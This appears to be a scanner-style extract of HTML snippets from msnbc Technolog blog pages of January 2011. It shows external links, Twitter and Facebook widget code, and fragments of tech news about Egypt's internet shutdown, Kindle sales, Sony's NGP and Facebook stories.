<p>Join the coversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" data-Text="Infograph: Egypt drops off the Internet">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5941456-infograph-egypt-drops-off-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5941146" data-contentId="5941146" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5941146.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5941146.jpg" width="280" height="93" alt="" />
...[SNIP]...
<p>"I had the Facebook for one purpose — to keep in contact with my family," Fteja told <a href="http://www.nydailynews.com/ny_local/2011/01/26/2011-01-26_man_sues_facebook_claiming_socialnetworking_site_shut_down_his_account_for_no_re.html" target="_blank">The Daily News</a>
...[SNIP]...
<p>There are a lot of mines to step on that could result in Facebook shutting down someone's account, according to its <a href="http://www.facebook.com/terms.php" target="_blank">terms of service</a>
...[SNIP]...
<p>"I know one thing - I didn't do anything," he told <a href="http://www.nypost.com/f/print/news/local/staten_island/si_man_hits_facebook_with_suit_rMmqxdBwUg9UJpHI8WIDIK" target="_blank">The New York Post</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" data-Text="Facebook-deprived man sues for $500K">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940974-facebook-deprived-man-sues-for-500k" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940889" data-contentId="5940889" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="athima-chansanchai/5940889.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/athima-chansanchai/5940889.jpg" width="280" height="280" alt="" />
...[SNIP]...
</a> we knew it'd only be a matter of time before we heard the announcement that Kindle books outsell paperback books. And now, about a month after that Kindle announcement, <a target="_blank" href="http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsArticle&ID=1521090&highlight=">it's here</a>
...[SNIP]...
<p>Since the beginning of the year, for every 100 paperback books Amazon has sold, the Company has sold 115 Kindle books. <a target="_blank" href="http://techcrunch.com/2010/07/19/kindle-sales/">In July, Kindle books surpassed hardcovers, selling 143 for every 100.</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" data-Text="Kindle books now outsell paperbacks">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940731-kindle-books-now-outsell-paperbacks" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5940823" data-contentId="5940823" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5940823.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5940823.jpg" width="280" height="157" alt="" /><p class="photo_credit">
...[SNIP]...
</a> — but as of yesterday, the Egyptian government pretty much took the entire country offline. <a href="http://www.renesys.com/blog/2011/01/egypt-leaves-the-internet.shtml">Here's what that looks like</a>
...[SNIP]...
<p>Meanwhile, the <a href="http://www.wired.com/threatlevel/2011/01/fbi-anonymous/">U.S. government knocked down dozens of doors </a>
...[SNIP]...
<p>It's now OK for photographers to take pictures outside public places and federal buildings — <a href="http://www.crunchgear.com/2011/01/27/photographers-youre-now-officially-free-to-shoot-in-public-places-and-outside-federal-buildings/">so there's, that</a>
...[SNIP]...
<p>Some dude on Staten Island is <a href="http://www.nypost.com/p/news/local/manhattan/antisocial_network_WIiiaZ4tHPBHHlXx4GuG5I">suing Facebook for $500,000 </a>
...[SNIP]...
<p>The white iPhone of legend made another short appearance — <a href="http://www.mobilecrunch.com/2011/01/27/the-elusive-white-iphone-appears-on-the-german-apple-website/">this time on the German Apple website </a>
...[SNIP]...
<p>Yeah, don't expect a lot of AT&T iPhone subscribers to jump ship when Verizon's version rolls around — <a href="http://digitaldaily.allthingsd.com/20110128/90-percent-of-att-iphone-subs-still-under-contract/?mod=twitter&utm_source=twitterfeed&utm_medium=twitter">90 percent of them are under contract</a>
...[SNIP]...
<p>Virgin is axing its <a href="http://consumerist.com/2011/01/virgin-mobile-adding-5gb-cap-and-throttle-21511.html">unlimited mobile broadband plan</a>
...[SNIP]...
<p>Amazon now sells <a href="http://techcrunch.com/2011/01/27/kindle-books-overtake-paperback-books-to-become-amazons-most-popular-format/">more Kindle books than paperbacks</a>
...[SNIP]...
<p>Hey! It's an online <a href="http://www.boingboing.net/2011/01/28/online-science-ficti.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+boingboing%2FiBag+%28Boing+Boing%29">Sci Fi writing website from Star Ship Sofa</a>
...[SNIP]...
<span id="ppt19818077">"Man vs. Wild's" Bear Grylls vs. "Survivorman's" Les Stroud in an<a href="http://www.urlesque.com/2011/01/27/bear-grylls-vs-les-stroud/"> Internet fight to the death! </a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" data-Text="Pre-caffeine tech: Man vs. the Internet!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/28/5940742-pre-caffeine-tech-man-vs-the-internet" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>Computer scientist <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">Stephen Wolfram</a>, the brains behind <a target="_blank" href="http://www.wolframalpha.com/">WolframAlpha</a>, tested how often the correct answers to "Jeopardy" questions appear in the title or text snippets of the results page on <a target="_blank" href="http://www.google.com/">Google</a>, <a target="_blank" href="http://www.bing.com/">Bing</a>
...[SNIP]...
wer on its result page 69 percent of the time. Ask.com's page had the correct answer 68 percent of the time. Bing registered a 63 percent success rate, and Yandex came in at 62 percent. <a target="_blank" href="http://blekko.com/">Blekko</a> (58 percent) and <a target="_blank" href="http://en.wikipedia.org/wiki/Main_Page">Wikipedia</a>
...[SNIP]...
<p>That's where the <a target="_blank" href="http://www-03.ibm.com/innovation/us/watson/">IBM Watson</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/12rNbGf2Wwo&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
e is great for answering questions from unstructured data. This has potential real-world applications such as mining medical documents or patents, and doing discovery in litigation, he notes in a <a target="_blank" href="http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/">blog post</a>
...[SNIP]...
<hr width="100%" size="2" align="center" />
<a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" data-Text="Search engines could play 'Jeopardy'">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5936454" data-contentId="5936454" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5936454.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg" width="600" height="335" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Weary of "therapist-shopping clients" crowing about the many credentials of cut-rate counselors, and alarmed at how easy it is to obtain such credentials over the Internet, Dr. Eichel launched the "<a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">Cat Credentialing Project</a>
...[SNIP]...
<div id="vine-inlinePhoto__5936378" data-contentId="5936378" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5936378.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg" width="280" height="183" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>While Oreo may be the very first in her family to obtain a diploma, she's not alone in her species. Fraudulent diplomas among the house pet set are so popular, <a href="http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas">there’s even a Wikipedia page that lists the honorees</a>
...[SNIP]...
<p>Learn more about the "Cat Credentialing Project" and how to find a qualified hypnotherapist <a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">on Dr. Eichel's website</a>
...[SNIP]...
<em><a href="http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist">via Gizmodo</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Get your fill of her blather on <a href="http://www.facebook.com/home.php#/profile.php?id=1151660271">Facebook</a> and <a href="http://twitter.com/HelenASPopkin">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" data-Text="Online degrees qualify cat to be your shrink">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<br />Twitter has been blocked in Egypt, but news about demonstrations, arrests and police retaliation are still being circulated on the Twitter hashtags <a href="http://twitter.com/#!/search?q=%23Egypt ">#Egypt</a>
...[SNIP]...
<p><a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html">Al Jazeera’s staff </a>has compiled tweets on the protests. <a href="http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html"></a>
...[SNIP]...
<br />Protesters continue to upload video, like this one of a man standing in front of a water-cannon truck, dubbing it, “<a href="http://www.youtube.com/watch?v=YtTUsqra-MU ">Egypt’s Tiananmen Square moment</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/YtTUsqra-MU&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<p>This <a href="http://www.youtube.com/">YouTube</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/Jjd6CGckke0&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
<br />The English edition of the independent <a href="http://www.almasryalyoum.com/en/subchannel/Top%20stories">Egyptian newspaper Al-Masry Al-Youm</a>
...[SNIP]...
<p>The <a href="http://www.guardian.co.uk/world/blog/2011/jan/27/egypt-protests">Guardian newspaper is live blogging </a>
...[SNIP]...
<p>Global Voices, an international community of bloggers, translates local social media into English and has a page dedicated to <a href="http://globalvoicesonline.org/specialcoverage/egypt-protests-2011/ ">Egypt Protests 2011.</a>
...[SNIP]...
<br /><a href="http://english.aljazeera.net/">Al Jazeera</a>
...[SNIP]...
<p>The <a href="http://thelede.blogs.nytimes.com/">New York Times’ Lede blog</a>
...[SNIP]...
<p>The Council on Foreign Relations has coverage of the foreign policy implications with one of the Middle East experts, <a href="http://blogs.cfr.org/cook/">Steven Cook, blogging from Cairo</a>
...[SNIP]...
<p><a href="http://blogs.cfr.org/cook/"></a>Foreign Policy also has an interesting analysis on the million-dollar question: <a href="http://lynch.foreignpolicy.com/posts/2011/01/26/will_the_arab_revolutions_spread">“Will the Arab revolutions spread?”</a>
...[SNIP]...
<p><a href="http://www.economist.com/node/18013760 ">The Economist</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" data-Text="Watching Egypt's protests">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://worldblog.msnbc.redacted/_news/2011/01/27/5936053-watching-egypts-protests?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
.33 million iPads. According to Ross Rubin at NPD, more than half were likely sold in the U.S. Let's say it's 4 million, for the sake of easy math. In that same quarter, AT&T announced that it had <a href="http://www.att.com/gen/press-room?pid=18952&cdvn=news&newsarticleid=31519&mapcode=financial">activated 442,000 3G iPads</a>
...[SNIP]...
<em>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or join the conversation on our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" data-Text="Don't worry, Wi-Fi-only tablets are coming">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5935650" data-contentId="5935650" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:264px;"><img id="helenaspopkin/5935650.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5935650.jpg" width="264" height="324" alt="" />
...[SNIP]...
<p>"Is anybody else getting random status updates from this person?" reads the first post in a Facebook Security discussion titled<a href="http://www.facebook.com/topic.php?uid=31987371885&topic=14769"> "Roy Castillo (Roy Castillo)"</a>
...[SNIP]...
<p>Then on Thursday, like Keyser Söze, he was gone, leaving little more than dozens of unanswered user questions, a <a href="http://www.facebook.com/topic.php?uid=31987371885&topic=14769#!/pages/Roy-Castillo-WTF/191704690855344">Roy Castillo WTF Fan Page </a>and a <a href="http://twitter.com/#!/search/%23roycastillo">hilarious Twitter thread</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about Facebook ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin">Twitter</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128">Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" data-Text="Mysterious 'Roy Castillo' haunts Facebook">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" data-Text="Android getting games from Sony">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>That's what Verizon is apparently offering, according to an e-mail shared by <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/">MacRumors.com</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" data-Text="Verizon offering AT&T iPhone trade-in program?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5934467" data-contentId="5934467" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5934467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5934467.jpg" width="280" height="210" alt="" /><div class="photo_credit_container">
...[SNIP]...
</span> <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/"><span>
...[SNIP]...
</span> saga, controversy, and hopefully, <a href="http://www.youtube.com/watch?v=4L-ueFdKzjc&feature=player_embedded">Julian <span>
...[SNIP]...
<p>Hooray! <a href="http://www.urlesque.com/2011/01/27/old-spice-guy-isaiah-mustafa-back/">The Old Spice dude is back!</a>
...[SNIP]...
<p>Oh noes! An Amazon security flaw may make <a href="http://feeds.gawker.com/~r/lifehacker/full/~3/VbASl0_jzW8/amazon-security-flaw-may-make-your-old-password-easy-to-crack">your old Amazon password easy to crack</a>
...[SNIP]...
</span> ... I wonder what ever happened to all those nerds in that one iconic Microsoft staff photo from 1978. <a href="http://www.businessinsider.com/microsoft-1978-photo-2011-1#">Maybe this link knows something. </a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" data-Text="Pre-caffeine tech: Security cracks, '70s nerds">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlineCode__5936907" class="inlineCode photo_align_block" data-contentid="5936907"><object width="592" height="346" id="msnbc8a9862" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
<p>President of SCE Worldwide Studios, Shuhei Yoshida, told the audience at the Tokyo event that the NGP's graphics are of PlayStation 3 quality, reported game blog Kotaku, which had reporter <a target="_blank" href="http://kotaku.com/5744297/live+blogging-sonys-psp2-press-event">Brian Ashcraft on site and live blogging from the event.</a>
...[SNIP]...
<div id="vine-inlinePhoto__5932923" data-contentId="5932923" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5932923.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5932923.jpg" width="600" height="396" alt="" /><p class="photo_credit">
...[SNIP]...
</span>And famed "Metal Gear" creator Hideo Kojima demonstrated "Metal Gear Solid 4: Guns of the Patriots" running on the NGP. In fact, <a target="_blank" href="http://kotaku.com/5744571/metal-gear-solid-4-lost-planet-yakuza-shown-playable-on-psp2">Kotaku reports</a>
...[SNIP]...
<p>The NGP certainly isn't a small device. Sony calls it a "Super Oval Design" which is meant to be comfortable for long play sessions, according to Sony's Jeff Rubenstein, who live blogged the event <a target="_blank" href="http://blog.us.playstation.com/2011/01/26/live-from-japan-playstation-meeting-2011/">via the PlayStation Blog</a>. And at 182 mm by 18.6 mm by 83.5 mm, it is larger than the current model PSP 3000. In fact, for a look at just how big it is, check out Kotaku's visual <a target="_blank" href="http://kotaku.com/5744563/lets-see-how-big-this-psp2-really-is">size comparison here</a>
...[SNIP]...
<div id="vine-inlinePhoto__5933512" data-contentId="5933512" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5933512.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5933512.jpg" width="600" height="409" alt="" /><div class="photo_credit_container">
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" data-Text="Sony reveals PSP successor - the Next Generation Portable">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927180" data-contentId="5927180" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5927180.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5927180.jpg" width="280" height="135" alt="" />
...[SNIP]...
<p>On Twitter, the short-messaging blog where posts are limited to 140 characters, access from Egypt was difficult as reported by <a href="http://www.herdict.org/web/">Herdict.org</a>
...[SNIP]...
million members and has the largest number of users of Facebook’s Arabic interface (2.2 million Facebook Arabic users in Egypt, versus 1.8 million in the Kingdom of Saudi Arabia)," according to <a href="http://www.spotonpr.com/egypt-facebook-demographics/">Spot On PR</a>
...[SNIP]...
networking shut-out has echoes of Iran 2-1/2 years ago, when in the wake of the presidential election and protests, the government there worked to block network and dial-up access to Facebook and <a href="http://redtape.msnbc.com/2009/06/twitter-1-censorship-0-why-its-working.html">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" data-Text="Egypt may be blocking Twitter and Facebook as protests grow">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em> - HTC is slated to unveil not one but two Facebook phones in February at the Mobile World Congress in Barcelona, according to <a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a>
...[SNIP]...
<p>City AM's reporter may have reported on the existence of the second Google Nexus phone, as <a href="http://mashable.com/2010/10/26/nexus-two/">Mashable points out</a>
...[SNIP]...
<em><a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a> via <a href="http://www.businessinsider.com/facebook-phone-wont-be-a-new-platform-2011-1">Business Insider</a> and <a href="http://mashable.com/2011/01/26/htc-to-unveil-2-facebook-phones-next-month/">Mashable</a>
...[SNIP]...
<i>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or skip the one-on-one and join the conversation at our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" data-Text="Rumor: Facebook phones are coming!!!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
